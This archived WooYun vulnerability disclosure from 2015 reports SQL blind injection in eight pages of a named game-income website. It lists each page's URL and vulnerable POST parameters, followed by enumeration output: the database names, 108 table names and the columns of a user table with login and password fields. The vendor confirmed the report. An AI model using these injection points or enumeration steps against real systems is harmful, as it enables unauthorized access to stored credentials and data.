乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-08: 细节已通知厂商并且等待厂商处理中 2015-08-13: 厂商已经确认,细节仅向厂商公开 2015-08-23: 细节向核心白帽子及相关领域专家公开 2015-09-02: 细节向普通白帽子公开 2015-09-12: 细节向实习白帽子公开 2015-09-27: 细节向公众公开
多处注入打包,多参数。求20RANK
SQL盲注,八处,每一处都有多个参数第一处,多参数
http://dj.49you.com/web/CPGameManage.jspPOST参数:beginTime=-1&cpName=mnxcfwuf&endTime=2015-08-08&gameNamestr=mnxcfwuf参数beginTime, cpName, endTime, gameNamestr都存在注入
第二处:
http://dj.49you.com/web/cpincome.jspPOST参数:beginTime=-1&cbName=pshrldjs&endTime=1&spName=pshrldjs参数beginTime, cdName, endTime, spName都存在注入
第三处:
http://dj.49you.com/web/cpProvinceList.jspPOST参数:beginTime=2015-08-08&cbName=-1&cityName=xdtmdadm&endTime=2015-08-08参数cbName,cityName都存在注入
第四处:
http://dj.49you.com/web/sy_sjwar_cpincome.jspPOST参数:beginTime=-1&endTime=1&spName=htkwbbeq参数beginTime,endTime,spName都存在注入
第五处:
http://dj.49you.com/web/tab/LyGameIncome.jspPOST参数:appname=-1&beginTime=2015-08-08&channelName=A0001&endTime=2015-08-08&spname=%e5%8c%97%e4%ba%ac%e5%88%9b%e6%84%8f%e6%af%94%e7%89%b9%e4%bf%a1%e6%81%af%e6%8a%80%e6%9c%af%e6%9c%89%e9%99%90%e5%85%ac%e5%8f%b8参数appname,beginTime,channelName,spname都存在注入
第六处
http://dj.49you.com/web/tab/WoGameIncome.jspPOST参数:appname=-1&beginTime=2015-08-01&channelName=%e5%9b%9b%e4%b9%9d%e6%b8%b8(0028969)&endTime=2015-08-08&spname=%e5%b9%bf%e5%b7%9e%e5%9b%9b%e4%b9%9d%e6%b8%b8&type=%e7%a7%bb%e5%8a%a8MM参数appname,beginTime,channelName,enTime,spname,type参数都存在注入
第七处:
http://dj.49you.com/web/tab/WoGameIncome0807.jspPOST参数:appname=xhofrmpv&beginTime=-1&channelName=%e5%9b%9b%e4%b9%9d%e6%b8%b8(0027913)&endTime=2015-08-08&spname=%e6%99%8b%e6%98%b6&type=%e7%a7%bb%e5%8a%a8MM参数beginTime,enTime,spname,type参数都存在注入
第八处:
http://dj.49you.com/web/tab/WoGameIncome2.jspPOST参数:beginTime=2015-08-01&endTime=2015-08-08&spname=%e5%b9%bf%e5%b7%9e%e5%9b%9b%e4%b9%9d%e6%b8%b8beginTime,endTime,spname参数都存在注入
web application technology: Nginxback-end DBMS: Microsoft SQL Server 2012current user: 'sp'current database: 'SP'current user is DBA: Falseavailable databases [17]:[*] Administration[*] blacklist[*] Company[*] DataBack[*] master[*] model[*] msdb[*] new_system[*] NZIformation[*] ReportServer[*] ReportServerTempDB[*] shouYou[*] SP[*] SP2[*] tempdb[*] Test[*] wap_gameweb application technology: Nginx, JSPback-end DBMS: Microsoft SQL Server 2012Database: SP[108 tables]+---------------------+| CityList || Ctstats || DHXGame_User || DXBaoYueZDYJH || OnlineProvince || PcInterface || ProvinceCity || ProvinceList || amountTable || baoyue || baoyue2 || black_imsi || by_send || cp_channel || cpbaccount || cppay || cppay_date || cppay_pro || dx_imsinum_mrtj || dx_phonenum_motj || dx_phonenum_mrtj || dxbaoyuesendrecord || dxopencity || dxspid || fee_request || fee_request1 || fp || fptaxrate || game || gameIncome || gametype || gamezhou || hourinfo || imei || importtxt || imsi || imsi0716 || interfaceAgency || kftsManage || ltgamerecv || ltsjyx || ltwogame || mmLoginInfor || mmOrder || mmShow || mm_list || mm_rule || mmcompany || mmctrl || mmqrecv || mmrecv || monthinformation || mosync || mrsync || newCityList || nz_cp || pb_cp || pcgame || pcgameid || pcweb || pinbi_cp || price || pro_tj || recv_mo || recvrecord || rules || send_mr || sendrecord || servicetype || settlement || settlement_back || settlement_pro || sjqbrecv || smsrecv || sq_phonenum_tj || tb_Day_Stat || tb_LINE || tb_LyDay_Stat || tb_LyDay_Stat0707 || tb_LyDay_Stat_0702 || tb_SP || tb_byDDmo || tb_byDDmr || tb_informMM || tb_monthcalculate || tb_spinformation || tb_sppay || tb_wyurlmanage || telimsi || telrecv || telrecvs || temp_send || temp_send1 || temp_send2 || testsendrecord || text || textlink || tj || tjOrd2 || tjbakbak || update_rules_record || vbtj || vw_rules || wjwar || wx_Login_Type || wx_User || xiaoguobiao || zxf_cp |+---------------------+web application technology: Nginx, JSPback-end DBMS: Microsoft SQL Server 2012Database: SPTable: wx_User[6 columns]+--------------+----------+| Column | Type |+--------------+----------+| COMPANY_NAME | varchar || ID | int || INSERT_TIME | datetime || LOGIN_NAME | varchar || LOGIN_PASS | varchar || TYPE_ID | int |+--------------+----------+
参数过滤,还有很多XSS,建议系统检查下这个站点。
危害等级:高
漏洞Rank:20
确认时间:2015-08-13 09:10
谢谢路人甲,我们这边安排技术处理中
暂无